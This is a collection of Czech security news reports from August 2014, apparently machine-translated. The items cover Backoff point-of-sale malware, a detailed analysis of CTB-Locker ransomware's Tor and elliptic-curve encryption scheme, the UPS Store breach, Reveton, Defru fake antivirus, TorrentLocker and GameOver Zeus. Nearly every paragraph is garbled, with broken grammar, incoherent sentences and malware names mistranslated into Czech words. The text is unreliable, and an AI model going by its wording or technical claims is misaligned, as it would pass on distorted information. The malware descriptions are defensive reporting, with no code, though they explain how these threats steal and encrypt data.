Není pochyb o tom pobídl masivní ztráty dat vstřebává v rozporu cílových dat a nejnověji Supervalu řetězy potravin a UPS, která zveřejněny minulý týden, že 51 z jejích obchodů se stali obětí krádeže kreditní karty malware , útočníci dělají krátký špatně zajištěné POS zařízení.
Backoff je poslední těžké v této aréně, a od svého veřejného odhalení 31. července se více než 1000 podniků byl zasažen, což přimělo americkou tajnou službou v pátek vydat poradní varovné podniky o hrozbě.
Department of Homeland Security a tajná služba varovala podniky být aktivnější při snímacích zařízení a sítí pro point-of-prodej malware, Backoff zejména.
"Během uplynulého roku, tajná služba reagovala na síťových útoků na mnoha podniky v celých Spojených státech, které byly ovlivněny" odpočítávání "malware. Sedm poskytovatelé Systém POS / dodavatelé potvrdili, že měli vliv více klientů, "řekl poradní. "Hlášení pokračuje na dalších napadených místech, zahrnující subjekty soukromého sektoru všech velikostí."
"Hlášení pokračuje na dalších napadených místech, zahrnující subjekty soukromého sektoru všech velikostí." Činné v trestním řízení a státní úředníci byli kontaktování podniků ovlivněny malware, a vyzývá ostatní, že se domnívají, že byly ovlivněny také obrátit na místní polní kanceláře tajná služba.
Backoff má obavy, protože je to efektivní při posouvání Údaje o zákaznících kreditní karty od firmy pomocí různých průsaků nástrojů, včetně paměti, nebo RAM, škrábání, technik, keyloggery a injekce do běžících procesů odborníků.
Zpráva z US-CERT že útočníci použít Backoff ukrást informace o platební kartě, když si porušil vzdálené plochy nebo aplikace pro správu, jeden, který je pomocí slabé nebo výchozí pověření bubnové v brute-force útok.
Backoff je pak instalován na point-of-prodej zařízení a vstřikuje kód do explorer.exe procesu, který škrábanců paměť z běžících procesů s cílem ukrást čísla kreditních karet, než oni jsou šifrována na zařízení a poslán do platebního procesoru. Backoff také otevírá zadní vrátka, kam se odešle ukradené údaje.
"Škodlivý stub, který se vstřikuje do explorer.exe je odpovědné za přetrvávání v případě, že nebezpečný spustitelný havaruje nebo násilím zastavit. Malware je zodpovědný za škrábání paměti z běžících procesů v počítači oběti a vyhledávání dat dráhy. Funkce keylogging je také přítomný v nejnovějších varianty "řízené odmlce". Navíc, malware má složku C2, který je zodpovědný za nahrávání objevil dat, aktualizace malware, stažení / provedení další malware, a odinstalování malware, " poradní říká z US-CERT.
Netrvalo dlouho, aby odborníci vinu za Target porušení na RAM škrábání malware, který analyzuje paměť hledá ve formátu čísla kreditních karet. Malware je vstříknut do běžícího procesu a chytne čísla z paměti dříve, než jsou šifrována na zařízení.
Útoky na point-of-prodej systémů byly velkou hrozbou poukázáno ve výroční Verizon dat Porušení vyšetřování zprávě (DBIR) , obvykle proto, že menší maloobchodní organizace nejsou dobře finančně řádně řešit zabezpečení. Větší organizace, jako je Target a Neiman Marcus, které by měly být v souladu s platební kartou Industry Data Security Standard (PCI-DSS), je jiný příběh. Standard vyžaduje určité záruky pro point-of-prodej systémů kromě nařizovat, jak jsou data šifrována karty při přepravě a skladování.
Hackeři skenování Internet hledá zranitelné verze nástroje pro vzdálenou správu a hrubou silou je doufat, že najde slabé nebo výchozí pověření v místě. Cílová Porušení dát více než 100 milionů na riziko krádeže identity a finanční ztráty, a to vedlo k odchodu několika vedoucích pracovníků, včetně tehdejšího ředitele Gregg Steinhafel.
ReversingLabs výtažky škodlivé soubory z provozu v síti 26.8.2014 Viry ReversingLabs oznámila N1000 Network File hrozbami senzoru přístroj, který využívá technologie Active rozkladu a prediktivní Detection pro detekci hrozby v souborech obsažených v e-mailu, webových a přenos souborů provoz.
Tyto inovace se nespoléhají na příznaky ohrožení, ale analyzovat interní ukazatele hrozeb v souborech. Výsledkem je obrana proti zero-day, cílené a polymorfní hrozby souborů. Řešení extrahuje všechny soubory z podporovaných síťových protokolů a poskytuje přehled o ukazatelích hrozeb v široké škále typů souborů. Kromě toho, toto řešení se integruje s SIEM a zpracování velkých objemů dat analytických řešení. ReversingLabs vyvinula Aktivní technologie rozkladu a prediktivní detekce pro řešení omezení dnešních malwaru na ochranu rostlin a poskytují novou úroveň detekce malwaru v široké škále spustitelných platforem. Aktivní rozkladu rozbalit Každý soubor, který chcete odhalit tisíce interních ukazatelů hrozeb, které jsou neviditelné konvence produkty. Prediktivní detekce využívá speciální šifrovací algoritmy pro výpočet podobnosti u souboru do známého škodlivého softwaru nebo jiných neznámých hrozeb. Tyto technologie zpracování souborů v milisekundách umožnit N1000 pro provoz na síti v plné rychlosti linky. ReversingLabs detekce malware nespoléhá na vykonávajících soubory, takže je lze proto zpracovat rozmanitou sadu typů souborů, včetně: Windows, Linux, OS X, Android, iOS, Windows Phone, populární formáty dokumentů a firmware. "Za posledních 5 let, ReversingLabs vyvinula analýzy souboru hrozbou technologií pro rovné podmínky pro obránce proti kybernetickým zločincům," řekl Mario Vuksan, generální ředitel společnosti ReversingLabs. "Tyto technologie jsou nyní k dispozici jako plug-and-play zařízení, jako je N1000, které poskytují průlomovou řešení zmírnění soubor hrozba." N1000 se připojuje k portu SPAN a extrahuje všechny soubory z SMTP, SMB, HTTP a FTP. Přístroj může být nakonfigurován tak, aby kontrolovat příchozí, odchozí a / nebo interní provoz. Zdrojová a cílová data pro soubory je také shromažďovány. Pokročilá pravidla Motor klasifikuje úroveň a dispozice ohrožení každého souboru. Zákazníci si mohou nastavit vlastní pravidla založená Yara, aby odpovídala jejich specifickým požadavkům. N1000 integruje s předními průmyslovými Siems a analytických řešení (například Palantir) na podporu opatření ke zmírnění ohrožení. Podezřelé soubory mohou být archivovány na NAS nebo externího úložiště pro další analýzu. "ReversingLabs má inovativní sadu technologií a řešení v souvislosti s novou třídu kybernetických protivníků," řekl Marc Eisenbarth, asert Research Manager & Architect at Arbor Networks. "Arbor Networks uvažovat průtok kritickou komponentu pro moderní bezpečnostní implementací. Jako konvenční obrany nefunguje, musíme rozšířit naše úsilí ze sledování otevřeného toku a protokol založený na skutečné anomálie souborů užitečné zatížení. " N1000 Soubor průtokoměr Přístroj je nyní k dispozici jako 1U hardwarové zařízení nebo virtuální zařízení (VDMK) kompatibilní s hlavními poskytovateli hypervisor a cloud služby.
Nová generace ransomware
25.8.2014 Viry Elliptic křivky kryptografie + Tor + Bitcoin
ŠIFROVÁNÍ DAT RANSOMWARE TOR Ransomware je dnes jedním z nejrychleji rostoucích kategorií škodlivého softwaru. V posledních několika letech se vyvinul z jednoduchých obrazovek blokátory náročné platby na něco mnohem nebezpečnější.
Třída Ransomware je nyní založen na tzv encryptors - trojské koně, které šifrovat každý druh údajů, které mohou mít hodnotu pro uživatele bez jeho vědomí. Tyto údaje mohou zahrnovat osobní fotky, archivy, dokumenty, databáze (například databáze používané v 1C: Enterprise software určený pro automatizaci obchodních činností), diagramy atd Aby se dešifrovat tyto soubory zločinci vyžadují platbu - často významnou částku . CryptoLocker , CryptoDefence (a jeho nástupce CryptoWall ), ACCDFISA a GpCode jsou některé z nejznámějších příkladů. Existuje také spousta méně známých rodin, které se šíří v Rusku a SNS.
Na konci června 2014 Kaspersky Lab zjištěn nový Encryptor. Analýza ukázala, že Trojan nemá nic společného s jinými známými rodinami a řadu funkcí, které navrhl, že to byl zcela nový výtvor. Jeho jméno? CTB-Locker.
Tato nová řada je detekován Kaspersky Lab jako Trojan-Ransom.Win32.Onion .
Toto šifrování malware patří k nové generaci ransomware. Jeho vývojáři použít jak osvědčené techniky "testovány" na jeho předchůdci (například požaduje, aby výkupné být vyplaceny Bitcoin), a řešení, která jsou zcela nové pro tuto třídu malware. Konkrétně skrývá velení a řízení serverů v síti Tor anonymita komplikuje pátrání po zločinci, a použití neortodoxní kryptografického systému je soubor dešifrování není možné, i když je zachycena komunikace mezi Trojan a serverem. To vše dělá Trojan Ransom.Win32.Onion vysoce nebezpečnou hrozbu a jeden z nejvíce technologicky vyspělých encryptors tam venku.
Popis
Algoritmus vysoké úrovni používá škodlivý šifrátoru je zcela běžné a je následující:
Po spuštění malware kopie jeho tělo, aby (CSIDL_COMMON_APPDATA) a dodává, že se spustí soubor na Plánovač úloh; vyhledat všechny pevné, odnímatelné a síťové disky pro soubory vyhovující seznam přípon (viz obrázek 1);
Obrázek fragment 1. Údaje se seznamem přípon souborů používaný šifrátoru
šifrovat soubory nalezené; zobrazí okno náročné výkupné a obsahuje seznam souborů, které byly zašifrované. Mezi zločinci požadují, aby uživatel zaplatit výkupné Bitcoins (obrázky 2, 3); nastavit obrázek s názvem AllFilesAreLocked.bmp jako pozadí pracovní plochy. Tapety informuje uživatele, že údaje v počítači byl zašifrovaný (obrázek 4).
Takže to, co odlišuje tento Trojan na rozdíl od desítek podobných škodlivých programů?
Příkaz Server se nachází v anonymitě sítě Tor
Analyzovaný vzorek má jednu statickou adresu příkaz serveru, který patří k .onion domény zóny. Stojí za zmínku, že to samo o sobě není "inovativní". Viděli jsme podobná opatření v jiných malware (diskutovali například zde a zde ).
Nicméně, toto je nový vývoj pro ransomware. Ačkoli některé z výkupného trojské koně z rodiny dříve zjištěných požadoval, aby oběť navštívit určitou stránku v síti Tor, malware zde diskutovány podporuje plnou interakci s Tor bez zásahu oběti , čímž se odlišuje od ostatních. To nás přivádí k další funkci, která je jedinečná mezi známého škodlivého softwaru .
Neobvyklé technická realizace přístupu k síti Tor
Všechny dříve zjištěn škodlivý software, je-li sděleny síti Tor vůbec, to udělal v obyčejný způsobem: uvedla na trh (někdy tím, že napíchne kód do jiných procesů) legitimní soubor tor.exe, který je k dispozici ke stažení na síti je oficiální webové stránky.
Trojan-Ransom.Win32.Onion nevyužívá existující soubor tor.exe. Místo toho celý kód potřebné k implementaci interakce s anonymitou sítě je staticky propojeny spustitelného souboru škodlivého programu (tj, je realizován jako součást škodlivého kódu) a je spuštěna v samostatném vlákně.
Obrázek 5. Pseudokód ukazuje, jak spuštění tor proxy, závit je realizován
Kód obsažený uvnitř thread_tor_proxy postupu je téměř vše převzato z otevřených zdrojů (TVZ je open-source projekt).
Po připojení k Tor byla zřízena a lokální server tor proxy server byl nastaven na IP 127.0.0.1 (číslo portu se liší od jednoho infikovaného počítače na jiný a závisí na parametru MachineGuid), globální příznak can_complete_circuit je nastaven, což je později zkontrolovat v závitu thread_post_unlock_data.
Jakmile se to stane, malware stanoví síťovou komunikaci s touto lokální adresy, jak je
Obrázek 6. Pseudokód ukazuje, jak je implementována síťová komunikace s tor proxy server
Žádost zaslaná malware na server obsahuje chráněné údaje potřebné k dešifrování souborů oběti.
V odezvě, server vrátí údaje o nákladech na odblokování soubory uživatele v bitcoins a amerických dolarech, stejně jako adresu peněženky, ke kterému je být placeno.
Komprimaci souborů před šifrováním
Žádný z encryptors nepoznal používá kompresní technologie (s výjimkou ACCDFISA , který prostě přidává soubory chráněné heslem RAR SFX archivu, ale v tomto případě šifrování a komprese není funkce prováděna škodlivého programu, ale pouze využití hotové výrobky - WinRAR).
V tomto aspektu jeho provozu, Trojan-Ransom.Win32.Onion také ukazuje značnou originalitu. Zde je to, co dělá:
přesune soubor oběti do dočasného souboru pomocí funkce MoveFileEx API; čte dočasný soubor z disku blok po bloku; každý blok je komprimován pomocí zlib volně distribuovaný knihovny (postup deflaci ()); po stlačení, každý blok je šifrován a zapsán na disk; informační služby požadované pro dešifrování je umístěn na začátku výsledného souboru; šifrovaný soubor dostane .ctbl rozšíření . Neobvyklé kryptografické schéma
Cryptomalware nejčastěji používá šifrovací systém založený na kombinaci AES + RSA. V tomto schématu, server vygeneruje dvojici klíčů - RSA-public + RSA soukromý - pro RSA, který je asymetrický šifrovací algoritmus. Soukromý klíč RSA soukromý, zůstává na serveru, zatímco RSA veřejných je odeslán na malware. Dále malware vygeneruje nový klíč - AES klíč - pro každý souborů oběti, které mají být použity AES, symetrický klíč bloku algoritmu. Každý soubor je šifrována pomocí AES, pak jeho AES klíč je šifrována pomocí RSA (pomocí RSA veřejný klíč) a uložit do souboru.
Protože systém využívá asymetrické šifrování, nikdo nemůže dešifrovat soubor, aniž byste museli RSA soukromého klíče, který nikdy neopustil serveru počítačovými zloději.
Nicméně, Trojan-Ransom.Win32.Onion použil neobvyklý přístup, ještě jednou!
Ukázkové používá asymetrický kryptografický protokol známý jako ECDH - eliptická křivka Diffie-Hellman .
Eliptická křivka Diffie-Hellman
Původní Diffie-Hellman algoritmus (takzvaný klíčový způsob výměny nebo sdílený tajný protokol ) byl vyvinut již před nějakou dobou a publikoval v roce 1976 známým cryptographers Whitfield Diffie a Martin Hellman. Modifikace algoritmu, který využívá eliptických křivek později vyšlo v roce 2000, v článku Certicom výzkum, standardy pro efektivní šifrování, SEC 1: Elliptic Curve Cryptography .
Podrobný popis protokolu je nad rámec této publikace, a proto budeme klesat podrobnosti a popsat hlavní zásady, které budou užitečné pro pochopení toho, jak funguje malware.
Dvojice klíčů - soukromý a veřejný mohou být generovány. Takzvaný sdílený tajný klíč lze generovat z vašeho soukromého klíče a veřejného klíče druhé strany. Pokud se obě strany si vyměnily veřejných klíčů (privátní klíče nejsou vyměněny!) a každý z nich samostatně vypočítá sdílený tajný klíč z veřejného klíče druhé strany a vlastní soukromý klíč, budou obě strany se stejnou hodnotu. Výsledný sdílené tajné mohou být použity jako klíč pro jakékoliv symetrický šifrovací algoritmus. Autoři Trojan-Ransom.Win32.Onion použít existující implementace tohoto šifrovacího algoritmu, popis, který je k dispozici na internetu.
Šifrovací schéma vysoké úrovni používané Trojan-Ransom.Win32.Onion je následující.
Generování klíčů:
malware generuje dvojice master-public (veřejný klíč) + master-soukromý (privátní klíč); Master-soukromého je odeslána na server bezpečně spolu s dalšími údaji. To není uložen na straně klienta (skutečnost, I); pro každý soubor, který chcete šifrovat, nový pár klíčů je generován - relace a veřejného + relace soukromého ; sdílený tajný klíč se vypočte takto: Relace sdílené = ECDH ( master-public , relace a soukromého sektoru ). Šifrování soubor patřící oběti
soubor je komprimován pomocí knihovny zlib; poté, co byl komprimován zlib každý soubor je šifrována pomocí AES, s hash sha256 ( session-shared ), používané jako klíčem; Po šifrování relace veřejný klíč je uložen v souboru (fakt II), zatímco relace soukromého není uložen (skutečnost, III); sdílený tajný klíč vypočítá - relace sdílet - není uložena, a to buď (fakt IV). Dešifrování souboru patřící oběti
Protokol Diffie-Hellman je navržen takovým způsobem, že následující rovnost jsou pravdivé:
Výše uvedená rovnost definuje základní princip, na kterém je založena činnost Trojan-Ransom.Win32.Onion.
Za předpokladu, že Trojan se neuloží relace soukromý a (viz skutečnost, III.) relace sdílené , jen jeden způsob dešifrování zůstane (viz fakt, IV.) - výpočet ECDH ( hlavní a soukromého sektoru , relace veřejnost ). To vyžaduje, aby hlavní a soukromého klíče (odeslané k serveru počítačoví zločinci ", viz fakt, I) a relace veřejný klíč (uložen na začátku šifrovaného souboru, viz fakt, II). Nejsou k dispozici žádné jiné způsoby, jak dešifrovat soubor, což znamená, že soubor nelze dešifrovat bez hlavního soukromého klíče.
Zabezpečení spojení s příkazem serveru
Klíčem odeslána na server mohou být zachyceny, ale bohužel, to by nebyla dostatečná k dešifrování souborů oběti. To je proto, že tvůrci malwaru používají stejný asymetrický protokol, ECDH, chránit jejich provoz, i když se samostatným, vyhrazené sadu klíčů.
tělo škodlivý program obsahuje veřejný klíč, na síti serveru -public ; při navazování spojení, malware vygeneruje nový pár klíčů: do sítě klient -public + síti klienta -Soukromé ; malware vypočítá sdílený tajný síťové sdílené = ECDH (do sítě klienta -Soukromé síti, serveru -public ); malware šifruje data odesílaná pomocí standardu AES s sha256 ( sdílená v síti ), používané jako klíčem; veřejný klíč síti klient -public je odeslána na server v nechráněné formě (skutečnost, VI); klíče klienta, sítě klient-public + síť-client-soukromé, stejně jako sdílený tajný klíč sítě sdílené, nejsou uloženy (fakt VII). Mezi zločinci mají klíčovou do sítě serveru -Soukromé a získat klíč do sítě klienta -public od klienta (viz přehled VI). V důsledku toho se mohou dešifrovat data přijatá. Chcete-li to, musí se počítat síťové sdílené = ECDH (do sítě klienta -public síti, serveru -Soukromé ).
Aniž by bylo do sítě serveru -Soukromé, tato hodnota nelze vypočítat (viz fakt VII). Jako výsledek, bohužel, zachycení provozu nebude poskytovat master-soukromé , bez níž soubor oběti nelze dešifrovat.
Propagace
Tvůrci raných verzí Trojan-Ransom.Win32.Onion se anglicky mluvící uživatele v pohledu jako jejich primární cíle, takže angličtina byla podporována pouze GUI jazyk.
V novějších verzích, ale ruská také přišel být podporovány v trojské GUI spolu s angličtinou. Kus malware prošly i některé vizuální rekonstrukcí, jako odpočítávání zobrazí se zastrašit uživatele. Nový ruský GUI, a konkrétněji některé řetězce v rámci těla Trojans nám dávají zem se domnívat, že jeho tvůrci jsou rusky mluvící.
Analýza, jak Trojan-Ransom.Win32.Onion proniká obětí počítače ukázala, že se liší (opět) v tomto směru od většiny ostatních encryptors, které jsou aktivní i dnes. Pro mnoho známých ransomware programů, hlavní šíření vektory jsou spamy s malware v příloze, nebo hovado nutit slabá hesla a spouštění souborů pomocí nástrojů pro vzdálenou správu.
Způsob propagace
Navázali jsme, že bot Andromeda (detekována jako Backdoor.Win32.Androm podle produktů společnosti Kaspersky Lab) přijme příkaz stáhnout a spustit další škodlivý program z E-mailové Worm.Win32.Joleee rodině oběti počítače. Ta je především nebezpečný nástroj pro posílání nevyžádané e-maily, ale také to může provést několik příkazů z zločinci, včetně příkazu ke stažení a spuštění spustitelného souboru. Je to vlastně Joleee že stáhne Encryptor do infikovaného počítače.
Trojan-Ransom.Win32.Onion šíření postup 's je uveden v následujícím diagramu.
Globální distribuce
Níže jsou uvedeny statistiky infekce od 20. července 2014. Většina pokusů o infekce se konala v SNS, zatímco tam byly jednotlivé případy zaznamenané v Německu, Bulharsku, Izraeli, Spojených arabských emirátech a Libyi.
Trojan-Ransom.Win32.Onion byl zjištěn v následujících zemích:
Země Počet uživatelů napadl Rusko 24 Ukrajina 19 Kazachstán 7 Bělorusko 9 Gruzie 1 Německo 1 Bulharsko 1 Turecko 1 Spojené arabské emiráty 1 Libye 1 Vezměte prosím na vědomí, že výše uvedená čísla jsou k dispozici na verdikt "Trojan-Ransom.Win32.Onion" pouze. Počet uživatelů napadených šifrátoru je ve skutečnosti větší, protože škodlivé baliči s různými verdikty jsou používány k šíření malware. Neznámé vzorky šifrátoru se také aktivně detekována produkty společnosti Kaspersky Lab "PDM: Trojan.Win32.Generic". Tato data není zahrnuta do výše uvedené statistiky.
Doporučení pro bezpečný pobyt
Záložní kopie důležitých souborů
Nejlepší způsob, jak zajistit bezpečnost kritických dat je konzistentní plán zálohování. Záloha by měla být pravidelně prováděna, a navíc je třeba vytvořit na paměťovém zařízení, které je přístupné pouze v průběhu tohoto procesu kopie (například vyměnitelné paměťové zařízení, které odpojí ihned po zálohování). Nedodržení těchto doporučení, bude mít za následek zálohovaných souborů byl napaden a šifrována ransomware stejným způsobem jako původní verze souborů.
Záložní postupy musí být zavedeny pro všechny systémy, které obsahují soubory jakéhokoli citelného významu. I když vzniknou žádné malware hrozby, pamatujte - nikdo je kompletně zabezpečen proti jednoduchým druhem selhání hardwaru.
Bezpečnostní řešení
Váš bezpečnostní řešení by mělo být zapnuto po celou dobu a všechny jeho součásti by měly být aktivní. Databáze roztok by měl být aktuální.
Produkty Kaspersky Lab detekuje tuto hrozbu na základě jejího podpisu s výrokem Trojan-Ransom.Win32.Onion. *. Neznámý změny jsou detekovány heuristicky s výrokem HEUR: Trojan.Win32.Generic, nebo aktivně s výrokem PDM: Trojan.Win32.Generic.
Kromě toho se produkty společnosti Kaspersky Lab začlenit technologii Cryptomalware protiopatření, který je schopen chránit data uživatele i od neznámých encryptors, pro které zatím neexistují podpisy nebo údaje cloud-based dispozici. Tato technologie je založena na principu vytváření chráněných záložní kopie osobního spisu, jakmile se podezřelý program pokusí přístup k nim. Tato technologie se automaticky obnoví soubor, i v případě, že je zašifrovaný pomocí škodlivého softwaru. Pro tato technologie fungovat, musí být součást System Watcher v nastavení produktů společnosti Kaspersky Lab.
51 prodejen UPS hit s PoS malware 24.8.2014 Viry UPS obchody, dceřiná společnost UPS, objevil malware systémů na 51 místech v 24 zemích (o 1%) 4470 franšízy centra místech v celých Spojených státech. UPS Store, as, kromě mnoha jiných prodejců v USA, který byl nedávno přijat Vláda bulletin týkající se široce založená průniku malwaru není identifikován v současné anti-virus software. Po obdržení bulletinu, UPS Store udržel zabezpečení IT firmy a provedla přezkum svých systémů a systémů jeho franšízy centra místech. na aktuální hodnocení na základě informace některých zákazníků ", kteří používají kreditní nebo debetní kartu na 51 ovlivnily franšízy místa centrum mezi 20 lednem 2014 a 11.08.2014, může být vystaven. Pro většinu lokalit, doba vystavení tohoto malwaru začala po 26. března 2014 malware byl vyřazen jako 11. srpna 2014. " Chápu tento typ události, může být rušivé a způsobovat frustrace. Omlouvám se za jakékoliv úzkosti To mohlo způsobit našim zákazníkům. At The UPS Store důvěra našich zákazníků je velmi důležité, "řekl Tim Davis, prezident UPS Store, Inc . "Jakmile jsme se stali vědomi potenciálního malware vniknutí, jsme nasadili rozsáhlé zdroje k rychlému řešení a odstranění tohoto problému. Naši zákazníci si mohou být jisti, že jsme identifikovali a plně vybavená incident," řekl Davis. Každý je franšíza udělena, lokalita centrum je individuálně vlastněné a běží nezávislé soukromé sítě, které nejsou připojeny k jiné franšízy centra místech. Informace zákazník, který může byli vystaveni obsahuje jména, poštovní adresy, e-mailové adresy a informace o platební kartě. Ne všechny z těchto informací může být vystaven pro každého zákazníka. na aktuálním základě hodnocení, UPS Store nemá žádné důkazy o podvodu vyplývající z tohoto incidentu. Společnost poskytuje informační internetové stránky, Identity Protection a dohledu nad úvěrovými služby pro zákazníky, jejichž data mohou být ohrožena.
Reveton ransomware nyní přichází s heslem zloděje 24.8.2014 Viry Reveton obrazovkou zamykání ransomware je stále s námi, a to vyvíjí. Podle výzkumníků Avast, nejnovější generace malware je také informační krást schopnosti.
Jedním z nových modulů Pony, univerzální heslo zloděj, že občas dostane přidáno do trojské koně, které mají modulární strukturu. "Pony autoři provádět hluboké reverzní inženýrské práce, které má za následek téměř každé heslo dešifrovaném do textového tvaru. malware může prasknout a dešifrování poměrně složitá hesla uložená v různých formách, "vědci sdílet. Modul shromažďuje informace, jako jsou místní hesla, pověření pro FTP klientů, stahování manažerů, e-mail a IM klienty, online poker klientů, hesla uložená v prohlížeči, pověření VPN, a tak dále . Všichni ve všech, Pony postihuje více než 110 aplikací, ale pokud to nestačí, Reveton obsahuje odkaz na stažení dalšího heslo zloděj. New Reveton varianty mají také dva další informace krádež moduly: jeden, který krade hesla nejpoužívanější digitální peněženky, a ten, který vyhledává historii a cookies prohlížeče souborů pro bankovní pověření. Dokonce i lockscreen modul byl aktualizován. "Autoři rozdělili program do více vláken, změnil šifrování, zachránil užitečného nákladu v registru a znovu komunikaci s C & C serverů," výzkumníci zaznamenali. Zdá se, že vývojáři Reveton se rozhodli rozšířit schopnosti malware v důsledku náporu z ransomware. Je pravděpodobné, že uživatelé jsou stále moudřejší a nedostanou strach do splacení, stejně jako předtím. krade Moduly informace může poskytnout malware trhovců se alespoň v některých hesel mohou prodávat na podzemní trzích. "Hesla do různých systémů a kryptografické měně peněženky jsou velmi lukrativní komoditou," poznamenal vědci. "Někteří hesla (FTP, e-maily, IM ...) jsou ideální pro šíření jejich malware a vybudovat pevnější botnety." Uživatelé jsou naléhat pravidelně zálohovat své soubory tak, aby jejich počítač nemůže být považována za výkupné v tomto typu programu. Uživatelé, kteří se staly obětí těchto novějších Reveton variant můžete sledovat avast je dezinfekční pokyny a jsou vyzýváni, aby co nejdříve změnit heslo pro všechny účty a služby on-line.
Crooks zkouší novou taktiku, k šíření falešné AV 24.8.2014 Viry Čísla infekce dobře zavedených falešné AV rodiny dosáhly nejnižší úrovně v letech, a výzkumníci společnosti Microsoft věří, že pokles je výsledkem úsilí antimalware průmyslu a větší informovanosti uživatelů. Jako vysavače obvykle mají tendenci, aby se brzy opět naplněna, další škodlivé hráče se pokusili krok ve věci v bodě:. se Defru Falešný AV . Defru je modus operandi je jednoduchý. Mění Windows 'hosts - soubor, který říká, PC, co webové stránky jít, když uživatel zadá URL do internetového prohlížeče - přesměrovat uživatele na škodlivé webové stránky, které se honosí falešný infekce varování:
Toto přesměrování se stane, když chce uživatel navštívit některou z více než 300 webových stránek , které obsahují ty populární AV dodavatelů, bezpečnostních fóra, zpravodajské servery, on-line služeb, sociálních sítí a vyhledávačů. Tento seznam je v současné době převážně naplněn webové stránky populární s Rusem mluvící uživatelé, které by nemělo být překvapením, vzhledem k tomu, že falešné varování je napsán v ruštině. varování se snaží přesvědčit uživatele, aby si koupit licenci na "Zabezpečení systému Windows", cena na 4,75 dolarů. Ti, kteří nebudou mít jejich systémy čistit, a budou i nadále přesměrováni na varování. Naštěstí tento malware je snadno odstranit. "Může uživatel čistit svůj systém tím, že odstraní vstupní hodnotu z" spustit "klíč registru, odstranit w1ndows_
exesoubor z disku a odstranit přidané záznamy z souboru hosts, "Microsoft radí . Ti, kteří nejste jisti, jak se to vše lze použít zdarma, legitimní AVS odstranit malware. "Předtím, než platit za produkt (buď v bezpečnostním produktu nebo na kteroukoli ostatní) provést důkladné šetření, aby se ujistil, že je to legitimní produkt, a to není fake, nebo kopie svobodného jedno, "dodali konečnou radu.
New ransomware emuluje CryptoLocker, CryptoWall 24.8.2014 Viry Ransomware Ukázalo se, že takový úspěšný peníze-výroba modelu, že nová varianta je objevena, nebo nová dodávka kampaň všiml téměř každý den. Bezpečnostní experti z iSIGHT Partners objevili nový kus PC ransomware, které nazval TorrentLocker, a říkají, že to je zcela nový kmen, který napodobuje jak CryptoLocker a CryptoWall . Vědci se domnívají, že je v současné době TorrentLocker zaměřuje převážně australských uživatelů, jako výše požadované výkupné uvedené v australských dolarech, a uživatelé jsou vyzýváni, aby pomocí australské Bitcoin výměnu dostat nutné ekvivalentní Bitcoin poslat podvodníci. Oni také věří, že ransomware se šíří prostřednictvím nevyžádané e-maily. "Pro malware začít šifrování souborů, je třeba mít aktivní připojení k Internetu," podělili. "Zpočátku, malware dostane ven k doméně napevno do malware pravděpodobně pro kontrolu připojení. To pak bude odesílat data na IP adresu hostingu informace o doméně a výměna certifikátů přes zabezpečené připojení. Pokud je úspěšná, malware začíná šifrování souborů a vyzve uživatele po jejím ukončení se zprávou výkupného. " Zpráva dělá to vypadat jako soubory, které byly zašifrovány CryptoLocker:
"Užitečné" sekce FAQ tvrdí, že všechny uživatele všechny důležité soubory byly zašifrovány pomocí RSA-2048 bitové šifrování, a že by se co pokazilo "je nemožné bez speciálního dešifrovacího softwaru." "Můžete si koupit tento dešifrovací software na našich webových stránkách," zprávu říká a ukazuje na místo vypisovat návod, jak to udělat. . Cena je závratný - 500 AUD - a bude se zvyšovat v následujících dnech podvodníci nabízejí také důkaz, že dešifrování software funguje: uživatelé mohou předložit jednu ze svých zašifrovaných souborů do webové stránky útočníka, a dostane ji zpět dešifrovat. Přes zřejmý spočívá ve zprávě, tam jsou některé, které většina uživatelů nebude na místě, jako je například skutečnost, že soubory jsou šifrovány algoritmem Rijndael, a ne RSA-2048. "Šifrovací metoda vyžaduje heslo pro šifrování. Není jasné, zda Heslo je uloženo lokálně, nebo načíst ze vzdáleného serveru, "vědci vysvětlil . "Je pravděpodobné, že heslo je generován na infekci. Opakované průjezdy téhož vzorku vyrábí různé šifrování souborů, které naznačují, že heslo bylo změněno. Má zatím být objeven Přesný způsob výroby hesla." TorrentLocker zajišťuje jeho vytrvalost v infikováno Systém uložením kopie sebe sama v několika složkách a vytvářet autorun klíč v registru. "Celkový dojem z malware vypadá CryptoWall, ale zprávy jsou zobrazené připomínající CryptoLocker. Je možné, že tvůrci CryptoLocker je sestavili tento nový malware, ale není to varianta známého ransomware, "poukázali. V současné době neexistuje důkaz, že TorrentLocker se prodává v podzemních fórech, takže je pravděpodobné, že jeho tvůrci jsou také ty, za touto kampaní.
New GameOver Zeus varianta stále obnovuje sestřelených botnet 24.8.2014 Viry Už je to všeobecně známo, že GameOver Zeus gang, jehož činnost byla dočasně překazil úspěšné nadnárodní prosazování práva takedown v červnu, se snaží získat zpět ztracenou půdu.
Nový malware varianta - přezdívaná newGOZ - nepoužívá P2P k dosažení svých C & C servery pokyny, ale byl upraven tak, aby vědět, kdy konkrétní C & C domény, bude on-line. "generace doména algoritmus (DGA) používá aktuální datum a náhodně vybraných začíná semeno vytvořit název domény. Pokud se doména nemá vyjít, semeno je zvýšen, a celý proces se opakuje, "vysvětlil vědci Arbor sítě. Tato změna umožnila jim závrtu některé z těchto oblastí, které je povoleno odhadnout velikost botnetů. Umístěný v závrtu údajů shromážděných v pondělí a pátek mezi 14. a 29, počet infekcí byla ve značné a stálým tempem roste, až do 25. července, kdy došlo k nárůstu o 1879%. Tento špice, vědci věří, je kvůli velkému spam kampaně zjištěné distribuci newGOZ přes Cutwail botnet. "V celkovém souhrnu a po dobu tří týdnů, našich pět závrty viděl 12353 jedinečný zdroj IP adresy ze všech koutů světa," podělili. Nejvíce infikované země byla ve Spojených státech (44%), následované Indií (22%) a ve Velké Británii (10%).
Nový trojský kůň ohrožuje legitimní aplikace včetně mobilního antimalwaru
15.8.2014 Viry | Mobil Trojského koně Android/Spy.Krysanec, který se skrývá v modifikovaných aplikacích pro Android a zprostředkovává vzdálený přístup, objevili experti Esetu.
